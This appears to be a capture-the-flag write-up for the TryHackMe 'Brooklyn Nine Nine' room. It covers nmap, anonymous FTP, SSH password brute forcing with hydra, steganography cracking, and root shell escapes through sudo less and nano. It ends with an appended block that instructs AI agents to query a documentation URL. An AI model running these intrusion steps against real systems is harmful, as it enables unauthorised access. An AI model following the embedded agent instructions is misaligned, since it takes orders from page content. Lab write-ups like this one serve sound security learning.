# Brooklyn Nine Nine

![](/files/-MbbrLdUUMlPBescrUcv)

## Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**)

```
nmap -Pn 10.10.146.230
```

![](/files/-MbbtMnQvlivMdfrfDot)

Detailed Nmap Scan :&#x20;

Command Breakdown:&#x20;

* (**-sV):** Service version
* (**-sC**): Default nmap scripts
* (**-p):** Specifying ports 21,22,80
* (**-oN nmap**): Saving it into a files called nmap

```
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.146.230
```

![](/files/-MbbtPTUPROqxT0yQEyY)

## Enumeration

### Port 21: FTP

Looks like we can login through ftp as anonymous, lets do that. (We use anonymous for both username and password or you can just hit enter for password)

```
ftp 10.10.146.230
```

![](/files/-Mbbu6IOris1hRup8wlF)

Lets list the file in this directory

![](/files/-MbbuCuXCQVoTDsmaXIk)

Looks like there is a file which is a note to a person called `Jake`, lets transfer this file to our machine and read what it has to say.

```
get note_to_jake.txt
```

![](/files/-MbbuYIoMld1HSwSzmnF)

Lets now read the file

![](/files/-MbbueQcLUC1u72G0b2o)

Looks like Jake did not change his password as mentioned by a person called `Amy`. We also have a username `Holt`, we now have three usernames

### Port 80: HTTP

Lets visit the website

![](/files/-MbbvCvugiKlsF1OzRPY)

Its a Brooklyn Nine Nine poster, lets look at the source code.

![](/files/-MbbvMnCUE6MqLLqk2L6)

We have something interesting, they mention steganography, which is the practice of concealing a message within message. So lets download the image onto our machine, the name of the image is in the source code

```
wget http://10.10.146.230/brooklyn99.jpg
```

![](/files/-MbbyEQBOmCFeUN9VM3w)

## Exploitation

### FTP

We can try to use hydra to find the password for `Jake`.

```
hydra -l jake -P /usr/share/wordlists/rockyou.txt http://10.10.146.230 ssh
```

![](/files/-MbbwW38KRAl9P445u84)

We found the password, so lets login through ssh.

```
ssh jake@10.10.146.230
```

![](/files/-MbbwgqpnNJ4VELClzRN)

And we are logged in. We can find the user flag here.

![](/files/-MbbxBSy1KC7ovgimTSI)

### HTTP

We can use a tool called [stegcracker ](https://github.com/Paradoxis/StegCracker)to find hidden messages within files. If you do not have it you can download it with this command

```
apt get install stegcracker
```

![](/files/-MbbzL7RTt9tDhJ8MUff)

Now you can use stegcracker&#x20;

```
stegcracker brooklyn99.jpg
```

![](/files/-MbbzuM9FafeQmFeV9DU)

We have the password, this can be the password for the file. Lets see what the file is hiding

```
steghide --extract -sf brooklyn99.jpg
```

![](/files/-Mbc03xnTMxMQXWtzFSV)

Now we have the password for Holt, lets login through ssh.

```
ssh holt@10.10.146.230
```

![](/files/-Mbc0H1hB--CrPgzsIjK)

## Privilege Escalation

### Jake

Lets run `sudo -l` to see what Jake can run as root.

```
sudo -l
```

![](/files/-MbbxI7vH4249OUCUh99)

Looks like we can run the less command, with which we can see contents of files, so lets run the command to check what `/root/root.txt` contains.

```
sudo /usr/bin/less /root/root.txt
```

![](/files/-MbbxcLSPasCfPWdok5R)

We can also try to become root using the commands found in [GTFOBins ](https://gtfobins.github.io/gtfobins/less/#sudo)

![](/files/-Mbc0nwkQoc1wF1MpyUU)

Lets use these commands to become root.

```
sudo less /etc/profile
!/bin/sh
```

![](/files/-Mbc0xYagAHxBaGtGbUs)

### Holt

Lets run `sudo -l` to see what Holt can run as root.

```
sudo -l
```

![](/files/-Mbc1EaMR9_n7t5LhH-S)

We can nano as root, so lets go to [GTFOBins ](https://gtfobins.github.io/gtfobins/nano/#sudo)to find the commands to escalate privilege's to root.

![](/files/-Mbc1UnVqeFu89dKcvha)

Lets run these commands

```
sudo nano
^R^X
reset; sh 1>&0 2>&0
```

![](/files/-Mbc1j9VF9SUJhmjc4za)

We are now root. You can find the root flag in `/root/`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://writeups.adityadindi.com/tryhackme/untitled/brooklyn-nine-nine.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.